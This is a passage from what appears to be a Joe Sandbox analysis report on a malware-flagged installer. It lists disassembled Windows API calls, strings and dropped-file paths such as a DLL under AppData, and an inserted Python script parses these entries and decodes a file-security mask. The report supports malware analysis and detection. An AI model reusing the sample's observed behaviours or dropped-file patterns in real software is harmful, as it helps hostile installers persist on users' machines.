                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe",00403318,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 004064E0
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004064E1, 004064E6
                                                                            • *?|<>/":, xrefs: 00406532
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2525390294
                                                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                            • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                            • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                            • GetSysColor.USER32(00000000), ref: 00404281
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                            • SetBkMode.GDI32(?,?), ref: 00404299
                                                                            • GetSysColor.USER32(?), ref: 004042AC
                                                                            • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                            • DeleteObject.GDI32(?), ref: 004042D6
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                            • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                            • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                              • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                            • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                            • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                            • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                                            • GetMessagePos.USER32 ref: 00404B9D
                                                                            • ScreenToClient.USER32(?,?), ref: 00404BB7
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                                            Strings
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401DB6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                            • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                            Strings
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Times New Roman
                                                                            • API String ID: 3808545654-927190056
                                                                            • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                            • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                                            • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                            • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                            • MulDiv.KERNEL32(00019600,00000064,0009E3B0), ref: 00402E20
                                                                            • wsprintfW.USER32 ref: 00402E30
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402E2A
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                            • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                                            • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                            • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                                            • wsprintfW.USER32 ref: 00404B16
                                                                            • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                            Strings
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$6B
                                                                            • API String ID: 3540041739-3884863406
                                                                            • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                            • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                                            • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                            • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\investeringsbelbenes\redocking.gal,000000FF,C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll,00000400,?,?,00000021), ref: 004025E2
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,000000FF,C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll,00000400,?,?,00000021), ref: 004025ED
                                                                            Strings
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                            • String ID: C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll$C:\Users\user\investeringsbelbenes\redocking.gal
                                                                            • API String ID: 3109718747-3099233647
                                                                            • Opcode ID: 7b04a4fba6618d77d657c9c2ab39c2f64db87fe02accc8d7244a3a28dc60ed8f
                                                                            • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                                            • Opcode Fuzzy Hash: 7b04a4fba6618d77d657c9c2ab39c2f64db87fe02accc8d7244a3a28dc60ed8f
                                                                            • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                                            APIs
                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                                                            • GetLastError.KERNEL32 ref: 004057D6
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                            • GetLastError.KERNEL32 ref: 004057F5
                                                                            Strings
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 3449924974-3080008178
                                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
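The per-function entries above all share one layout (an "APIs" list, an optional "Strings" list, the memory-dump provenance, then the "Similarity" identifiers), and that regularity makes them easy to mine in bulk. The script below is an added example, not Joe Sandbox code and not part of this report: it parses entries in that layout into records, drops the "Download File" link residue the web page attaches to the dump lines, and decodes the SECURITY_INFORMATION mask passed to SetFileSecurityW (the 80000007 in the entry above is OWNER | GROUP | DACL | PROTECTED_DACL, i.e. a protected DACL that stops inheritance from the parent directory). The sample text embedded in the script is a constructed excerpt modelled on the lines above; the regexes assume the bullet and "ref:"/"xrefs:" layout shown here and Python 3.9 or newer.

```python
"""Parse Joe Sandbox per-function entries (APIs / Strings / Memory Dump Source /
Similarity) into records and decode SetFileSecurityW's SECURITY_INFORMATION mask.
Added example, not Joe Sandbox's own code; the sample below is a constructed excerpt."""
import re
from typing import Dict, List, Tuple

# Constructed sample in the report's layout: two function entries.
SAMPLE = r"""APIs
• CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
• GetLastError.KERNEL32 ref: 004057D6
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
• GetLastError.KERNEL32 ref: 004057F5
Strings
Memory Dump Source
• Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\Desktop
• API String ID: 3449924974-3080008178
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
• wsprintfW.USER32 ref: 00402E30
Strings
• verifying installer: %d%%, xrefs: 00402E2A
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*),\s*xrefs:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

def parse_entries(report_text: str) -> List[Dict]:
    """Split report text into one record per function entry (an entry starts at 'APIs')."""
    entries, section, cur = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":
                cur = {"apis": [], "strings": [], "dumps": [], "similarity": {}}
                entries.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"]
                cur["apis"].append({"name": m["name"], "module": m["module"],
                                    "args": args.split(",") if args else [], "ref": m["ref"]})
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                cur["strings"].append((m["text"], m["ref"]))
        elif section in ("Memory Dump Source", "Joe Sandbox IDA Plugin"):
            # "Download File" is a link label from the web page, not part of the dump name.
            cur["dumps"].append(line.lstrip("• ").removesuffix("Download File").strip())
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                cur["similarity"][m["key"].strip()] = m["value"].strip()
    return entries

# SECURITY_INFORMATION bits from the Windows SDK (winnt.h).
SECURITY_INFORMATION = [
    (0x00000001, "OWNER"), (0x00000002, "GROUP"), (0x00000004, "DACL"), (0x00000008, "SACL"),
    (0x00000010, "LABEL"), (0x00000020, "ATTRIBUTE"), (0x00000040, "SCOPE"),
    (0x10000000, "UNPROTECTED_SACL"), (0x20000000, "UNPROTECTED_DACL"),
    (0x40000000, "PROTECTED_SACL"), (0x80000000, "PROTECTED_DACL"),
]

def decode_security_information(flags: int) -> List[str]:
    """Name every set bit; anything outside the known mask is reported as UNKNOWN."""
    names = [name for bit, name in SECURITY_INFORMATION if flags & bit]
    leftover = flags & ~sum(bit for bit, _ in SECURITY_INFORMATION)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:08X}")
    return names

def security_calls(entries: List[Dict]) -> List[Tuple[str, List[str]]]:
    """(call site, decoded mask) for each SetFileSecurityW whose mask the sandbox resolved."""
    found = []
    for entry in entries:
        for call in entry["apis"]:
            if call["name"] == "SetFileSecurityW" and len(call["args"]) >= 2:
                try:
                    flags = int(call["args"][1], 16)
                except ValueError:  # "?" means the argument was not resolved
                    continue
                found.append((call["ref"], decode_security_information(flags)))
    return found

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for entry in parsed:
        print(entry["similarity"].get("API ID"), [c["name"] for c in entry["apis"]])
    print(security_calls(parsed))
```

Feeding the whole disassembly section of a report through parse_entries gives one record per function, so API IDs, strings and call sites can be grepped or diffed across samples instead of read one block at a time; unresolved arguments (shown as "?" in the report) are skipped rather than guessed.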
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                            • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                             Memory Dump Source
                                                                             • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                            • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                                            • Opcode Fuzzy Hash: 6c88db696a2834356160cf22a034812d05f7fa2de6f9a6422368acb1ec934c8d
                                                                            • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-2145255484
                                                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                            • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
